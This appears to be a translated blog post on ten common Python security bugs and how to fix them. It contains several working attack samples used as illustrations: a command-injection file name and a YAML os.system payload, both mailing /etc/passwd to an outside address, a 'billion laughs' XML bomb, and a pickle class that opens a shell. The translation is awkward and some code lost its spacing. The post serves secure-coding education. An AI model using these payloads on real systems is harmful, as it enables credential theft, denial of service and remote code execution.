10 most common security bugs in Python and how to avoid them

Transfer

Hello!

Our next group in Python was successfully launched on Monday, but we still have one more materialchik left, which we did not have time to place before the start. We correct our mistake and hope that you will like it.

Go!

Writing secure code is difficult. When you learn a language, module, or framework, you will learn how to use it. You also need to think about how they can be used incorrectly in the security context. Python is no exception, even in the standard library documentation there is a description of bad practices for writing protected applications. However, many Python developers simply do not know about them.

Here is my top 10 (in random order) of the most common errors in applications written in Python.

1. The introduction of injections

There are many types of code injection attacks and they are all quite common. They affect all languages, frameworks and environments.

SQL injection is when you write SQL queries directly, rather than using ORM and mix string literals with variables. I have read a lot of code where “escaping quotes” is considered a fix. This is not true. You can familiarize yourself with the many ways SQL is introduced in this cheat sheet .

Command injection is when at any time you invoke a process with popen, subprocess, os.system and take arguments from variables. When calling local commands, there is the possibility that someone would set these values to something malicious.

Imagine this simple script [credit]. You call a subprocess with the file name provided by the user:

import subprocess
deftranscode_file(request, filename):
   command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
   subprocess.call(command, shell=True)  # a bad idea!

The attacker sets the value of the filename "; cat /etc/passwd | mail them@domain.comor something as dangerous.

Solution:

Sterilize the input with the help of the utilities that come with your web framework, if you use any. If you have no good reason, do not create SQL queries manually. Most ORMs have built-in disinfection methods.

For the shell, use the shlex module to properly shield the input .

2. Parsing XML

If your application loads and parses XML files, it is likely that you are using one of the standard XML library modules. There are several common attacks via XML. Mainly in DoS-style (designed to drop the system, not to filter data). These attacks are quite common, especially if you parse external (i.e., those that cannot be trusted) XML files.

One of them is called “billion laughs” because of the payload, usually containing many (billions) “lol”. Basically, the idea is that you can make reference objects in XML, so when your unpretentious XML parser tries to load this file into memory, it consumes gigabytes of RAM. Try it if you don't believe me :-)

<?xml version="1.0"?><!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]><lolz>&lol9;</lolz>

Other attacks use expansion with an external entity. XML maintains links to entities from external URLs, the XML parser usually requests and loads this resource without any problems. “An attacker can bypass firewalls and gain access to limited resources, since all requests are made from an internal and reliable IP address, and not from outside.”

Another situation worth considering is third-party packages for decoding XML that you depend on, such as configuration files, remote APIs. You may not even suspect that one of your dependencies is open to these types of attacks.
What happens in Python? Well, standard library modules, etree, DOM, xmlrpc are wide open for such attacks. This is well documented here .

Decision:

Use defusedxml as a replacement for standard library modules. He adds defensive measures against these types of attacks.

3. Assert instructions

Do not use assert to protect code fragments to which the user should not apply. Take this simple example:

deffoo(request, user):assert user.is_admin, “user does not have access”
  # secure code...

Now, by default, Python is executed with an __debug__equal value of true, but in a combat environment it usually runs with optimization. The instruction assert will be skipped and the program will go directly to the protected code, regardless of whether the user is_admin or not.

Solution:

Use instructions assertonly to interact with other developers, for example, in unit tests or to protect against misuse of the API.

4. Temporary attacks

Temporary attacks are essentially a way of exposing the behavior and algorithm of a program by determining the time needed to compare the values provided. Temporary attacks require accuracy, so they usually do not work on a remote network with high latency. Due to the variable latency associated with most web applications, it is almost impossible to record a temporary attack through HTTP web servers.

But if you have a command line application that asks for a password, an attacker can write a simple script to calculate how long it takes to compare their values with the actual password. An example .

If you want to see how they work, there are some impressive examples, such as this SSH-based temporary attack.written in Python.

Solution:

Use secrets.compare_digest, introduced in Python 3.5, to compare passwords and other private values.

5. Contaminated site-packages or import path

Python has a very flexible import system. It's great when you are trying to write monkey patches for your tests or are overloading basic functions.

But this is one of the biggest security holes in Python.

Installing third-party packages in your site-packages, whether in a virtual environment or global site-packages (which usually discourages), provides you with security holes in these packages.

There have been cases of publishing PyPi packages with names similar to the names of popular packages, but executing arbitrary code . The biggest incident, fortunately, was not dangerous and simply “put an end” to the fact that they did not pay attention to the problem.

Another situation that you need to think about is the dependencies of your dependencies (and so on). They may include vulnerabilities, and they may also override the default behavior in Python through the import system.

Solution:

Check your packages. Look at PyUp.io and their security service. Use the virtual environment for all applications and make sure your global site-packages are as clean as possible. Check package signatures.

6. Temporary files

To create temporary files in Python, you usually first generate the file name using a function mktemp(), and then create the file using the generated name. “This is not safe because another process can create a file with the same name between the time it is called mktemp()and the next attempt to create the file by the first process. This means that it can trick your application by either loading incorrect data or endangering other temporary data.

Recent versions of Python will show a runtime warning if you call the wrong method.

Solution:

Use the tempfile module and use mkstemp if you need to create temporary files.

7. Using yaml.load

Quoting PyYAML documentation:

Warning. It is not safe to call yaml.load with any data from an unreliable source! yaml.load is as effective as pickle.load, and therefore can call any Python function.

This excellent example is found in the popular Ansible project. You can give the Ansible Vault a value as a (valid) YAML. It calls os.system()with the arguments presented in the file.

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]

Thus, by downloading YAML files from user supplied values, you are wide open to attack.

Demonstrating this in action, thanks to Anthony Sottile

Solution:

Use yaml.safe_load, almost always, if you don’t have a really good reason not to.

8. Pickles

Deserializing canned data is as bad as YAML. Python classes can declare a magic method __reduce__that returns a string, or a tuple with the callee, and pass arguments to invoke during conservation. An attacker can use this to include references to one of the subprocess modules to launch arbitrary commands on the host.

This interesting example shows how to preserve a class that opens a shell in Python 2. There are many more examples of how to use pickle.

import cPickle
import subprocess
import base64
classRunBinSh(object):def__reduce__(self):return (subprocess.Popen, (('/bin/sh',),))
print base64.b64encode(cPickle.dumps(RunBinSh()))

Solution:

Never reopen data from an unreliable or unchecked source. Instead, use a different serialization pattern, such as JSON.

9. Use Python runtime system and do not patch it.

Most POSIX systems come with a version of Python 2. Naturally, already obsolete.

Since “Python”, that is, CPython is written in C, there are times when the Python interpreter itself has holes. Common security issues in C are related to memory allocation, as are buffer overflow errors.

Over the years, CPython had several overflow or overflow vulnerabilities, each of which was fixed and fixed in subsequent releases.
So you are safe. More precisely, if you install patches for your runtime .

Here is an example for version 2.7.13 and below , an integer overflow vulnerability that allows code to be executed. This example is for any Ubuntu up to version 17 without patches installed.

Solution:

Install the latest version of Python for your combat applications and all patches!

10. Do not install patches for your dependencies.

Just as you don't install patches for your runtime, you also need to install patches for your dependencies on a regular basis.

I think the practice of “pinning” versions of Python packages from PyPi in packages is terrifying. The idea is that “ these are the versions that work, ” so everyone leaves it alone.

All of the vulnerabilities in the code I mentioned above are just as important when they exist in the packages that your application uses. The developers of these packages fix security issues. All the time.

Solution:

Use services such as PyUp.io to check for updates, set up download / merge requests to the application, and run tests to update packages.
Usetools, such as InSpec, for checking installed versions in production environments and ensuring that minor versions or version ranges are fixed.

Have you tried Bandit?

There is a large static linter that will find all these problems in your code and more! It's called bandit, simply, pip install banditand bandit ./codedir

PyCQA / bandit.

I thank RedHat for this wonderful article that I used in some of my research.

THE END!

As always, we will be glad to see your comments and questions :)

Tags: